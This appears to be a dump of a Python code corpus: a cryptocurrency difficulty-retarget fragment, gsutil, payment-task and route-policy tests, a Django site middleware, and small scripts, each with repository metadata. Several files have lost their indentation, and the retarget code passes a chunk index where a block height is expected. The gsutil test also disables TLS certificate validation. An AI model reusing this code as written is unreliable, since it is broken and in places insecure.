if os.path.exists(name):
with open(name, 'rb') as f:
f.seek(delta * header_size)
h = f.read(header_size)
return deserialize_header(h, height)
def get_hash(self, height):
return hash_header(self.read_header(height))
def get_target_dgw(self, block_height, chain=None):
if chain is None:
chain = []
last = self.read_header(block_height-1)
if last is None:
for h in chain:
if h.get('block_height') == block_height-1:
last = h
# params
BlockLastSolved = last
BlockReading = last
nActualTimespan = 0
LastBlockTime = 0
PastBlocksMin = 24
PastBlocksMax = 24
CountBlocks = 0
PastDifficultyAverage = 0
PastDifficultyAveragePrev = 0
bnNum = 0
if BlockLastSolved is None or block_height-1 < PastBlocksMin:
return target_to_bits(max_target), max_target
for i in range(1, PastBlocksMax + 1):
CountBlocks += 1
if CountBlocks <= PastBlocksMin:
if CountBlocks == 1:
PastDifficultyAverage = bits_to_target(BlockReading.get('bits'))
else:
bnNum = bits_to_target(BlockReading.get('bits'))
                    PastDifficultyAverage = ((PastDifficultyAveragePrev * CountBlocks) + bnNum) // (CountBlocks + 1)
PastDifficultyAveragePrev = PastDifficultyAverage
if LastBlockTime > 0:
Diff = (LastBlockTime - BlockReading.get('timestamp'))
nActualTimespan += Diff
LastBlockTime = BlockReading.get('timestamp')
BlockReading = self.read_header((block_height-1) - CountBlocks)
if BlockReading is None:
for br in chain:
if br.get('block_height') == (block_height-1) - CountBlocks:
BlockReading = br
bnNew = PastDifficultyAverage
nTargetTimespan = CountBlocks * target_spacing
        # clamp with integer arithmetic so the target stays an int
        nActualTimespan = max(nActualTimespan, nTargetTimespan // 3)
        nActualTimespan = min(nActualTimespan, nTargetTimespan * 3)
        # retarget
        bnNew *= nActualTimespan
        bnNew //= nTargetTimespan
bnNew = min(bnNew, max_target)
new_bits = target_to_bits(bnNew)
return new_bits, bnNew
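
    # Worked numbers for the clamp above (illustrative): with PastBlocksMax = 24
    # and target_spacing = 180 s, nTargetTimespan = 24 * 180 = 4320 s, so
    # nActualTimespan is held to [4320 // 3, 4320 * 3] = [1440 s, 12960 s]
    # before the averaged target is rescaled.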
    def get_target(self, height, chain=None):
        if chain is None:
            chain = []  # Do not use mutables as default values!
        if height == 0 or not USE_DIFF_CALC:
            return target_to_bits(max_target), max_target
        if height > START_CALC_HEIGHT:
            return self.get_target_dgw(height, chain)
        # below the DGW activation height the difficulty is not checked,
        # so fall back to the maximum target instead of returning None
        return target_to_bits(max_target), max_target
def can_connect(self, header, check_height=True):
height = header['block_height']
if check_height and self.height() != height - 1:
return False
if height == 0:
return hash_header(header) == bitcoin.NetworkConstants.GENESIS
previous_header = self.read_header(height -1)
if not previous_header:
return False
prev_hash = hash_header(previous_header)
if prev_hash != header.get('prev_block_hash'):
return False
bits, target = self.get_target(height // 2016)
try:
self.verify_header(header, previous_header, bits, target)
except:
return False
return True
def connect_chunk(self, idx, hexdata):
try:
data = bfh(hexdata)
self.verify_chunk(idx, data)
#self.print_error("validated chunk %d" % idx)
self.save_chunk(idx, data)
return True
except BaseException as e:
self.print_error('verify_chunk failed', str(e))
return False
| [
"[email protected]"
] | |
1e12863ed3a72096532a03ece32b12e9211e3a96 | a59d55ecf9054d0750168d3ca9cc62a0f2b28b95 | /platform/gsutil/gslib/tests/test_perfdiag.py | 154b60919fd93d78dc4900e94ebc93c1dbbbc19d | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | bopopescu/google-cloud-sdk | bb2746ff020c87271398196f21a646d9d8689348 | b34e6a18f1e89673508166acce816111c3421e4b | refs/heads/master | 2022-11-26T07:33:32.877033 | 2014-06-29T20:43:23 | 2014-06-29T20:43:23 | 282,306,367 | 0 | 0 | NOASSERTION | 2020-07-24T20:04:47 | 2020-07-24T20:04:46 | null | UTF-8 | Python | false | false | 4,129 | py | # Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Integration tests for perfdiag command."""
import socket
import gslib.tests.testcase as testcase
from gslib.tests.util import ObjectToURI as suri
from gslib.tests.util import unittest
from gslib.util import IS_WINDOWS
class TestPerfDiag(testcase.GsUtilIntegrationTestCase):
"""Integration tests for perfdiag command."""
# We want to test that perfdiag works both when connecting to the standard gs
# endpoint, and when connecting to a specific IP or host while setting the
# host header. For the 2nd case we resolve storage.googleapis.com to a
# specific IP and connect to that explicitly.
_gs_ip = socket.gethostbyname('storage.googleapis.com')
_custom_endpoint_flags = [
'-o', 'Credentials:gs_host=' + _gs_ip,
'-o', 'Credentials:gs_host_header=storage.googleapis.com',
# TODO: gsutil-beta: Add host header support for JSON
'-o', 'Boto:https_validate_certificates=False']
def test_latency(self):
bucket_uri = self.CreateBucket()
cmd = ['perfdiag', '-n', '1', '-t', 'lat', suri(bucket_uri)]
self.RunGsUtil(cmd)
if self.test_api == 'XML':
self.RunGsUtil(self._custom_endpoint_flags + cmd)
def _run_basic_wthru_or_rthru(self, test_name, num_processes, num_threads):
bucket_uri = self.CreateBucket()
cmd = ['perfdiag', '-n', str(num_processes * num_threads),
'-s', '1024', '-c', str(num_processes),
'-k', str(num_threads), '-t', test_name, suri(bucket_uri)]
self.RunGsUtil(cmd)
if self.test_api == 'XML':
self.RunGsUtil(self._custom_endpoint_flags + cmd)
def test_write_throughput_single_process_multi_thread(self):
self._run_basic_wthru_or_rthru('wthru', 1, 2)
@unittest.skipIf(IS_WINDOWS, 'Multiprocessing is not supported on Windows')
def test_write_throughput_multi_process_single_thread(self):
self._run_basic_wthru_or_rthru('wthru', 2, 1)
@unittest.skipIf(IS_WINDOWS, 'Multiprocessing is not supported on Windows')
def test_write_throughput_multi_process_multi_thread(self):
self._run_basic_wthru_or_rthru('wthru', 2, 2)
def test_read_throughput_single_process_multi_thread(self):
self._run_basic_wthru_or_rthru('rthru', 1, 2)
@unittest.skipIf(IS_WINDOWS, 'Multiprocessing is not supported on Windows')
def test_read_throughput_multi_process_single_thread(self):
self._run_basic_wthru_or_rthru('rthru', 2, 1)
@unittest.skipIf(IS_WINDOWS, 'Multiprocessing is not supported on Windows')
def test_read_throughput_multi_process_multi_thread(self):
self._run_basic_wthru_or_rthru('rthru', 2, 2)
def test_input_output(self):
outpath = self.CreateTempFile()
bucket_uri = self.CreateBucket()
self.RunGsUtil(['perfdiag', '-o', outpath, '-n', '1', '-t', 'lat',
suri(bucket_uri)])
self.RunGsUtil(['perfdiag', '-i', outpath])
def test_invalid_size(self):
stderr = self.RunGsUtil(
['perfdiag', '-n', '1', '-s', 'foo', '-t', 'wthru', 'gs://foobar'],
expected_status=1, return_stderr=True)
self.assertIn('Invalid -s', stderr)
def test_toobig_size(self):
stderr = self.RunGsUtil(
['perfdiag', '-n', '1', '-s', '3pb', '-t', 'wthru', 'gs://foobar'],
expected_status=1, return_stderr=True)
self.assertIn('Maximum throughput file size', stderr)
def test_listing(self):
bucket_uri = self.CreateBucket()
stdout = self.RunGsUtil(
['perfdiag', '-n', '1', '-t', 'list', suri(bucket_uri)],
return_stdout=True)
self.assertIn('Number of listing calls made:', stdout)
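
# Shell equivalents of the commands these tests build (illustrative; the
# flags mirror the RunGsUtil argument lists above):
#   gsutil perfdiag -n 1 -t lat gs://<bucket>                      # latency
#   gsutil perfdiag -n 4 -s 1024 -c 2 -k 2 -t wthru gs://<bucket>  # write throughput
#   gsutil perfdiag -o out.json -n 1 -t lat gs://<bucket>          # save results
#   gsutil perfdiag -i out.json                                    # re-display them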
| [
"[email protected]"
] | |
87a8b29f0f025d84e48f78bd24494c4f37bfcd95 | 79f284d1e8ecd2a4e65c09bbaa3c7f4462e72401 | /liqpay_int/tests/tasks/test_process_payment_complaint_patch.py | eb9b113adad57e7431ac268e9639997f1abf9da3 | [] | no_license | ProzorroUKR/prozorro_tasks | 9ed62c40dbd5b631e3ff7357e89194e8deb20e05 | e948f8860b0b7ef6d8d7de042cf08d73c5250ba2 | refs/heads/master | 2023-06-22T14:44:33.473461 | 2023-05-15T12:07:43 | 2023-05-15T12:07:43 | 163,171,499 | 4 | 1 | null | 2023-05-01T21:27:21 | 2018-12-26T11:15:44 | Python | UTF-8 | Python | false | false | 10,556 | py | import unittest
import requests
from unittest.mock import patch, Mock, call, ANY
from celery.exceptions import Retry
from environment_settings import DEFAULT_RETRY_AFTER
from liqpay_int.tasks import process_payment_complaint_patch
from payments.message_ids import (
PAYMENTS_PATCH_COMPLAINT_EXCEPTION,
PAYMENTS_PATCH_COMPLAINT_CODE_ERROR,
PAYMENTS_PATCH_COMPLAINT_PENDING_SUCCESS,
PAYMENTS_PATCH_COMPLAINT_NOT_PENDING_SUCCESS,
)
class TestHandlerCase(unittest.TestCase):
def test_handle_connection_error(self):
payment_data = {"description": "test"}
complaint_params = {"test": "test"}
patch_data = {"patch_test_field": "patch_test_value"}
with patch("payments.utils.requests") as requests_mock, \
patch("payments.logging.push_payment_message") as push_payment_message:
requests_mock.patch.side_effect = requests.exceptions.ConnectionError()
process_payment_complaint_patch.retry = Mock(side_effect=Retry)
with self.assertRaises(Retry):
process_payment_complaint_patch(
complaint_params=complaint_params,
payment_data=payment_data,
patch_data=patch_data,
)
self.assertEqual(
push_payment_message.mock_calls,
[
call(payment_data, PAYMENTS_PATCH_COMPLAINT_EXCEPTION, ANY),
]
)
process_payment_complaint_patch.retry.assert_called_once_with(
countdown=DEFAULT_RETRY_AFTER,
exc=requests_mock.patch.side_effect
)
def test_handle_429_response(self):
payment_data = {"description": "test"}
complaint_params = {"test": "test"}
cookies = {"TEST_COOKIE": "TEST_COOKIE_VALUE"}
patch_data = {"patch_test_field": "patch_test_value"}
process_payment_complaint_patch.retry = Mock(
side_effect=Retry
)
ret_aft = 13
with patch("payments.utils.requests") as requests_mock, \
patch("payments.logging.push_payment_message") as push_payment_message:
requests_mock.patch.return_value = Mock(
status_code=429,
cookies=Mock(get_dict=Mock(return_value=cookies)),
headers={"Retry-After": ret_aft}
)
with self.assertRaises(Retry):
process_payment_complaint_patch(
complaint_params=complaint_params,
payment_data=payment_data,
patch_data=patch_data,
)
self.assertEqual(
push_payment_message.mock_calls,
[
call(payment_data, PAYMENTS_PATCH_COMPLAINT_CODE_ERROR, ANY),
]
)
process_payment_complaint_patch.retry.assert_called_once_with(
countdown=ret_aft
)
def test_handle_412_response(self):
payment_data = {"description": "test"}
complaint_params = {"test": "test"}
cookies = {"TEST_COOKIE": "TEST_COOKIE_VALUE"}
patch_data = {"patch_test_field": "patch_test_value"}
process_payment_complaint_patch.retry = Mock(
side_effect=Retry
)
with patch("payments.utils.requests") as requests_mock, \
patch("payments.logging.push_payment_message") as push_payment_message:
requests_mock.patch.return_value = Mock(
status_code=412,
cookies=Mock(get_dict=Mock(return_value=cookies))
)
with self.assertRaises(Retry):
process_payment_complaint_patch(
complaint_params=complaint_params,
payment_data=payment_data,
patch_data=patch_data,
)
self.assertEqual(
push_payment_message.mock_calls,
[
call(payment_data, PAYMENTS_PATCH_COMPLAINT_CODE_ERROR, ANY),
]
)
process_payment_complaint_patch.retry.assert_called_once_with(
countdown=0,
kwargs=dict(
payment_data=payment_data,
complaint_params=complaint_params,
patch_data=patch_data,
cookies=cookies,
)
)
def test_handle_500_response(self):
payment_data = {"description": "test"}
complaint_params = {"test": "test"}
cookies = {"TEST_COOKIE": "TEST_COOKIE_VALUE"}
patch_data = {"patch_test_field": "patch_test_value"}
process_payment_complaint_patch.retry = Mock(
side_effect=Retry
)
with patch("payments.utils.requests") as requests_mock, \
patch("payments.logging.push_payment_message") as push_payment_message:
requests_mock.patch.return_value = Mock(
status_code=500,
cookies=Mock(get_dict=Mock(return_value=cookies)),
headers={}
)
with self.assertRaises(Retry):
process_payment_complaint_patch(
complaint_params=complaint_params,
payment_data=payment_data,
patch_data=patch_data,
)
self.assertEqual(
push_payment_message.mock_calls,
[
call(payment_data, PAYMENTS_PATCH_COMPLAINT_CODE_ERROR, ANY),
]
)
process_payment_complaint_patch.retry.assert_called_once_with(
countdown=DEFAULT_RETRY_AFTER
)
def test_handle_404_response(self):
payment_data = {"description": "test"}
complaint_params = {"test": "test"}
cookies = {"TEST_COOKIE": "TEST_COOKIE_VALUE"}
patch_data = {"patch_test_field": "patch_test_value"}
process_payment_complaint_patch.retry = Mock(
side_effect=Retry
)
with patch("payments.utils.requests") as requests_mock, \
patch("payments.logging.push_payment_message") as push_payment_message:
requests_mock.patch.return_value = Mock(
status_code=404,
cookies=Mock(get_dict=Mock(return_value=cookies)),
headers={}
)
with self.assertRaises(Retry):
process_payment_complaint_patch(
complaint_params=complaint_params,
payment_data=payment_data,
patch_data=patch_data,
)
self.assertEqual(
push_payment_message.mock_calls,
[
call(payment_data, PAYMENTS_PATCH_COMPLAINT_CODE_ERROR, ANY),
]
)
process_payment_complaint_patch.retry.assert_called_once_with(
countdown=DEFAULT_RETRY_AFTER
)
@patch("liqpay_int.tasks.process_payment_complaint_recheck")
def test_handle_403_response(self, process_payment_complaint_recheck):
payment_data = {"description": "test"}
complaint_params = {"test": "test"}
cookies = {"TEST_COOKIE": "TEST_COOKIE_VALUE"}
patch_data = {"patch_test_field": "patch_test_value"}
with patch("payments.utils.requests") as requests_mock, \
patch("payments.logging.push_payment_message") as push_payment_message:
requests_mock.patch.return_value = Mock(
status_code=403,
cookies=Mock(get_dict=Mock(return_value=cookies)),
headers={}
)
process_payment_complaint_patch(
complaint_params=complaint_params,
payment_data=payment_data,
patch_data=patch_data,
)
self.assertEqual(
push_payment_message.mock_calls,
[
call(payment_data, PAYMENTS_PATCH_COMPLAINT_CODE_ERROR, ANY),
]
)
process_payment_complaint_recheck.apply_async.assert_called_once_with(
kwargs=dict(
payment_data=payment_data,
complaint_params=complaint_params,
patch_data=patch_data,
cookies=cookies
)
)
def test_handle_200_response_complaint_pending(self):
payment_data = {"description": "test"}
complaint_params = {"test": "test"}
cookies = {"TEST_COOKIE": "TEST_COOKIE_VALUE"}
patch_data = {
"status": "pending"
}
with patch("payments.utils.requests") as requests_mock, \
patch("payments.logging.push_payment_message") as push_payment_message:
requests_mock.patch.return_value = Mock(
status_code=200,
cookies=Mock(get_dict=Mock(return_value=cookies))
)
requests_mock.patch.return_value.json.return_value = {"data": {"author": "test"}}
process_payment_complaint_patch(
complaint_params=complaint_params,
payment_data=payment_data,
patch_data=patch_data,
)
self.assertEqual(
push_payment_message.mock_calls,
[
call(payment_data, PAYMENTS_PATCH_COMPLAINT_PENDING_SUCCESS, ANY),
]
)
def test_handle_200_response_complaint_mistaken(self):
payment_data = {"description": "test"}
complaint_params = {"test": "test"}
cookies = {"TEST_COOKIE": "TEST_COOKIE_VALUE"}
patch_data = {
"status": "mistaken"
}
with patch("payments.utils.requests") as requests_mock, \
patch("payments.logging.push_payment_message") as push_payment_message:
requests_mock.patch.return_value = Mock(
status_code=200,
cookies=Mock(get_dict=Mock(return_value=cookies))
)
requests_mock.patch.return_value.json.return_value = {"data": {"author": "test"}}
process_payment_complaint_patch(
complaint_params=complaint_params,
payment_data=payment_data,
patch_data=patch_data,
)
self.assertEqual(
push_payment_message.mock_calls,
[
call(payment_data, PAYMENTS_PATCH_COMPLAINT_NOT_PENDING_SUCCESS, ANY),
]
)
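
# Status-code handling exercised by the tests above (behaviour of the task
# under test, as asserted): 429 retries after the Retry-After header value;
# 412 retries immediately, forwarding the server cookies; 500 and 404 retry
# after DEFAULT_RETRY_AFTER; 403 hands off to process_payment_complaint_recheck
# with the new cookies; 200 logs pending/not-pending success per patch status.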
| [
"[email protected]"
] | |
8e4474d37dbadeacda29af5e1b54ffe20ecd50a6 | 9789aaa94e4a321fed2a1f624ef180d938f1fe56 | /src/common/appenginepatch/ragendja/sites/dynamicsite.py | 6726a46f3ba6519e5807b3b081d1ea305ce0e818 | [
"MIT",
"Apache-2.0"
] | permissive | fantascy/snsanalytics | 61ff6b8f384f0bd4be8f89a2a19101ad2cf1bc77 | 927f186c7f5a1d534e0ff7ce7aff46a0c1a36c51 | refs/heads/master | 2021-01-13T14:18:05.684839 | 2016-11-06T07:43:35 | 2016-11-06T07:43:35 | 72,827,547 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,871 | py | from django.conf import settings
from django.core.cache import cache
from django.contrib.sites.models import Site
from ragendja.dbutils import db_create
from ragendja.pyutils import make_tls_property
_default_site_id = getattr(settings, 'SITE_ID', None)
SITE_ID = settings.__class__.SITE_ID = make_tls_property()
class DynamicSiteIDMiddleware(object):
"""Sets settings.SIDE_ID based on request's domain"""
def process_request(self, request):
# Ignore port if it's 80 or 443
if ':' in request.get_host():
domain, port = request.get_host().split(':')
try:
if int(port) not in (80, 443):
domain = request.get_host()
except:
pass
else:
domain = request.get_host().split(':')[0]
# We cache the SITE_ID
cache_key = 'Site:domain:%s' % domain
site = cache.get(cache_key)
if site:
SITE_ID.value = site
else:
site = Site.all().filter('domain =', domain).get()
if not site:
# Fall back to with/without 'www.'
if domain.startswith('www.'):
fallback_domain = domain[4:]
else:
fallback_domain = 'www.' + domain
site = Site.all().filter('domain =', fallback_domain).get()
# Add site if it doesn't exist
if not site and getattr(settings, 'CREATE_SITES_AUTOMATICALLY',
True):
site = db_create(Site, domain=domain, name=domain)
site.put()
# Set SITE_ID for this thread/request
if site:
SITE_ID.value = str(site.key())
else:
SITE_ID.value = _default_site_id
cache.set(cache_key, SITE_ID.value, 5*60)
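
# Minimal wiring sketch (illustrative; the settings below follow the
# Django 1.x conventions this middleware targets and are assumptions,
# not taken from this repository):
#
#   MIDDLEWARE_CLASSES = (
#       'ragendja.sites.dynamicsite.DynamicSiteIDMiddleware',
#       # ... remaining middleware ...
#   )
#   CREATE_SITES_AUTOMATICALLY = True  # set False to stop auto-creating Sites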
| [
"[email protected]"
] | |
48c0e44801b00a0cd341ed48de18a466761dc047 | 7af7f44a7ab947094cf923fc911474f7f8c8b25b | /pkgs/conf-pkg/src/genie/libs/conf/route_policy/iosxr/tests/test_route_policy.py | 7a90802740d3fc16e1ed2430e6a6137dc9fe8cf5 | [
"Apache-2.0"
] | permissive | miott/genielibs | fb6bdd244063b4dbe4b8ba61387cb5dce76d2fe8 | 6464642cdd67aa2367bdbb12561af4bb060e5e62 | refs/heads/master | 2020-09-11T07:14:13.067983 | 2019-12-03T02:38:40 | 2019-12-03T02:38:40 | 221,984,648 | 0 | 0 | Apache-2.0 | 2019-11-15T18:52:07 | 2019-11-15T18:52:07 | null | UTF-8 | Python | false | false | 9,021 | py | # import python
import operator
import unittest
import unittest.mock
from unittest.mock import Mock
# import genie
from genie.conf.tests import TestCase
from genie.conf import Genie
from genie.conf.base import Testbed, Device, Interface
from genie.libs.conf.route_policy import RoutePolicy
class test_route_policy(TestCase):
def test_init(self):
Genie.testbed = testbed = Testbed()
dev1 = Device(testbed=testbed, name='PE1', os='iosxr')
intf1 = Interface(device=dev1, name='GigabitEthernet0/0/0/1',
ipv4='10.1.0.1/24')
intf2 = Interface(device=dev1, name='GigabitEthernet0/0/0/2',
ipv4='10.2.0.1/24')
intf3 = Interface(device=dev1, name='GigabitEthernet0/0/0/3',
ipv4='10.3.0.1/24')
dev2 = Device(testbed=testbed, name='PE2', os='iosxr')
intf4 = Interface(device=dev2, name='GigabitEthernet0/0/0/3',
ipv4='10.1.0.2/24')
intf5 = Interface(device=dev2, name='GigabitEthernet0/0/0/4',
ipv4='10.2.0.2/24')
with self.assertNoWarnings():
rpl1 = RoutePolicy(name='rpl1')
dev1.add_feature(rpl1)
rpl1.pass_on = True
cfgs = rpl1.build_config(apply=False)
self.assertCountEqual(cfgs.keys(), [dev1.name])
self.assertMultiLineDictEqual(cfgs, {
dev1.name: '\n'.join([
'route-policy rpl1',
' pass',
' end-policy',
]),
})
rpl1 = RoutePolicy(name='rpl1')
dev1.add_feature(rpl1)
rpl1.conditions = []
cond = RoutePolicy.Condition(
RoutePolicy.Condition.op_contains,
(intf1.ipv4.ip, intf2.ipv4.network),
'destination')
cond.if_attr.set_nexthop = intf3.ipv4.ip
cond.else_attr.drop_on = True
rpl1.conditions.append(cond)
cfgs = rpl1.build_config(apply=False)
self.assertCountEqual(cfgs.keys(), [dev1.name])
self.assertMultiLineDictEqual(cfgs, {
dev1.name: '\n'.join([
'route-policy rpl1',
' if destination in (10.1.0.1, 10.2.0.0/24) then',
' set next-hop 10.3.0.1',
' else',
' drop',
' endif',
' end-policy',
]),
})
class A(object):
def __repr__(self):
return '<a>'
def __init__(self):
self.rpl_set = Mock(side_effect=setattr)
self.rpl_get = Mock(side_effect=getattr)
a = A()
a.destination = intf5.ipv4.ip
pass_on = rpl1.rpl_apply_attributes(a, setattr=a.rpl_set,
getattr=a.rpl_get)
self.assertEqual(a.rpl_get.call_args_list, [
unittest.mock.call(a, 'destination'),
])
self.assertEqual(a.rpl_set.call_args_list, [
unittest.mock.call(a, 'nexthop', intf3.ipv4.ip),
])
self.assertIs(pass_on, True)
a = A()
a.destination = intf4.ipv4.ip
pass_on = rpl1.rpl_apply_attributes(a, setattr=a.rpl_set,
getattr=a.rpl_get)
self.assertEqual(a.rpl_get.call_args_list, [
unittest.mock.call(a, 'destination'),
])
self.assertEqual(a.rpl_set.call_args_list, [
unittest.mock.call(a, 'drop', True),
])
self.assertIs(pass_on, False)
del cond.else_attr.drop_on
cfgs = rpl1.build_config(apply=False)
self.assertCountEqual(cfgs.keys(), [dev1.name])
self.assertMultiLineDictEqual(cfgs, {
dev1.name: '\n'.join([
'route-policy rpl1',
' if destination in (10.1.0.1, 10.2.0.0/24) then',
' set next-hop 10.3.0.1',
' endif',
' end-policy',
]),
})
a = A()
a.destination = intf4.ipv4.ip
pass_on = rpl1.rpl_apply_attributes(a, setattr=a.rpl_set,
getattr=a.rpl_get)
self.assertEqual(a.rpl_get.call_args_list, [
unittest.mock.call(a, 'destination'),
])
self.assertEqual(a.rpl_set.call_args_list, [
])
self.assertIs(pass_on, False)
def test_basic_uncfg_with_name(self):
'''
Testing in case of having 'name' as the route-policy name.
'''
Genie.testbed = testbed = Testbed()
dev1 = Device(testbed=testbed, name='PE1', os='iosxr')
rpl1 = RoutePolicy(name='rpl1')
dev1.add_feature(rpl1)
rpl1.device_attr[dev1].statement_attr['10']
rpl1.device_attr[dev1].statement_attr['10'].match_med_eq = 5
rpl1.device_attr[dev1].statement_attr['10'].match_nexthop_in = 'hop'
rpl1.device_attr[dev1].statement_attr['10'].actions = 'pass'
# Unconfig testing
# Set a mock
dev1.configure = Mock()
dev1.add_feature(rpl1)
# Mock config
uncfg1 = rpl1.build_unconfig(apply=False)
self.assertCountEqual(uncfg1.keys(), ['PE1'])
self.assertMultiLineEqual(str(uncfg1['PE1']), '\n'.join(
['no route-policy rpl1'
]))
def test_basic_cfg(self):
Genie.testbed = testbed = Testbed()
dev1 = Device(testbed=testbed, name='PE1', os='iosxr')
dev2 = Device(testbed=testbed, name='PE2', os='iosxr')
rpl1 = RoutePolicy(policy_definition='rpl1')
dev1.add_feature(rpl1)
rpl1.device_attr[dev1].statement_attr[10]
rpl1.device_attr[dev1].statement_attr[10].match_med_eq = 5
rpl1.device_attr[dev1].statement_attr[10].match_nexthop_in = 'hop'
rpl1.device_attr[dev1].statement_attr[10].actions = 'pass'
rpl1.device_attr[dev1].statement_attr[20]
rpl1.device_attr[dev1].statement_attr[20].match_med_eq = 10
rpl1.device_attr[dev1].statement_attr[20].match_nexthop_in = 'hop2'
rpl1.device_attr[dev1].statement_attr[20].match_local_pref_eq = 16
rpl1.device_attr[dev1].statement_attr[20].actions = 'drop'
rpl1.device_attr[dev1].statement_attr[30]
rpl1.device_attr[dev1].statement_attr[30].match_med_eq = 20
rpl1.device_attr[dev1].statement_attr[30].match_nexthop_in = 'hop3'
rpl1.device_attr[dev1].statement_attr[30].actions = 'done'
rpl1.device_attr[dev1].statement_attr[30].set_med = 32
cfgs = rpl1.build_config(apply=False)
self.assertCountEqual(cfgs.keys(), [dev1.name])
self.assertMultiLineEqual(str(cfgs[dev1.name]), '\n'.join(
['route-policy rpl1',
' if med eq 5 and next-hop in hop then',
' # 10',
' pass',
' elseif local-preference eq 16 and med eq 10 and next-hop in hop2 then',
' # 20',
' drop',
' elseif med eq 20 and next-hop in hop3 then',
' # 30',
' set med 32',
' done',
' endif',
' end-policy',
' exit'
]))
# Testing the configuration without if/else statements
# ----------------------------------------------------
rpl2 = RoutePolicy(policy_definition='rpl2')
dev2.add_feature(rpl2)
rpl2.device_attr[dev2].statement_attr['10']
rpl2.device_attr[dev2].statement_attr['10'].actions = 'pass'
rpl2.device_attr[dev2].statement_attr['10'].set_med = 32
cfgs2 = rpl2.build_config(apply=False)
self.assertCountEqual(cfgs2.keys(), [dev2.name])
self.assertMultiLineEqual(str(cfgs2[dev2.name]), '\n'.join(
['route-policy rpl2',
' # 10',
' set med 32',
' pass',
' end-policy',
' exit'
]))
def test_basic_uncfg(self):
Genie.testbed = testbed = Testbed()
dev1 = Device(testbed=testbed, name='PE1', os='iosxr')
rpl1 = RoutePolicy(policy_definition='rpl1')
dev1.add_feature(rpl1)
rpl1.device_attr[dev1].statement_attr['10']
rpl1.device_attr[dev1].statement_attr['10'].match_med_eq = 5
rpl1.device_attr[dev1].statement_attr['10'].match_nexthop_in = 'hop'
rpl1.device_attr[dev1].statement_attr['10'].actions = 'pass'
# Unconfig testing
# Set a mock
dev1.configure = Mock()
dev1.add_feature(rpl1)
# Mock config
uncfg1 = rpl1.build_unconfig(apply=False)
self.assertCountEqual(uncfg1.keys(), ['PE1'])
self.assertMultiLineEqual(str(uncfg1['PE1']), '\n'.join(
['no route-policy rpl1'
]))
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
e181215cb13fb8115ec569045a2a436e59e5014d | 53dd5d2cfb79edc87f6c606bbfb7d0bedcf6da61 | /.history/EMR/SBSteat_20190605143628.py | 436cd5b69bcdf8df0610fd888bd8a19bbd9dbf67 | [] | no_license | cyc19950621/python | 4add54894dc81187211aa8d45e5115903b69a182 | d184b83e73334a37d413306d3694e14a19580cb0 | refs/heads/master | 2020-04-11T20:39:34.641303 | 2019-07-02T12:54:49 | 2019-07-02T12:54:49 | 162,078,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 898 | py | def SBS(A,B):
if A==0 or B ==0:
return 0
elif set(A)<=set(B) or set(B)<=set(A):
return 1
else:
return len(set(A)&set(B)) /len(set(A)|set(B))
def StrToList(A):
C=[]
for i in A:
C.append(i)
return C
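#Quick check of SBS (illustrative, not in the original file):
#SBS('abc','bcd') -> |{b,c}| / |{a,b,c,d}| = 2/4 = 0.5
#SBS('ab','abc')  -> 1, because {a,b} is a subset of {a,b,c}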
import re
f = open(r'D:\DeepLearning ER\Z1006014.txt','r',errors='ignore')
g = open(r'C:\Users\Administrator\Desktop\ICD-10.txt','r',errors='ignore')
line_re=[]
lines = f.readlines()
#dictionary terms, one per line, with trailing newlines stripped
dics = [re.sub('\n','',dic) for dic in g.readlines()]
out = []
for line in lines:
    line=re.sub('\n','',line)
    line=re.sub(' ','',line)
    #strip both full-width and ASCII question marks
    line = re.sub(r'?|\?', '',line)
    line = re.sub(r'\,|\.|;','',line)
    line_re.append(line)
while '' in line_re:
    line_re.remove('')
for line in line_re:
    for dic in dics:
        if set(line) >= set(dic):
            out.append(dic)
        #the source file breaks off mid-statement here; a plausible
        #completion keeps near-matches above a similarity threshold
        #(the 0.5 cutoff is an assumed value, not from the original)
        elif SBS(line, dic) >= 0.5:
            out.append(dic)
"[email protected]"
] | |
9ea449314a5ebdfc2798ec21f4d3570831fdb476 | 9a7904a3ee4abd4c352a746b13963073aa62314b | /01_jumptopy/Jump_to_Python/chap03/138-2.py | 8ebb6a4d81830ab05e6f85c0700c8997c49930e7 | [] | no_license | cat-holic/Python-Bigdata | 4ab1528fa9e804206a2381ac08293088c3e9e250 | 2cb6c75eb02b3b0dc3a16a63c0446c1fc6f04f71 | refs/heads/master | 2020-03-15T09:27:33.944887 | 2018-08-02T08:16:35 | 2018-08-02T08:16:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 60 | py | i=0
while True:
i+=1
if i>5:break
print('*'*i)
| [
"[email protected]"
] |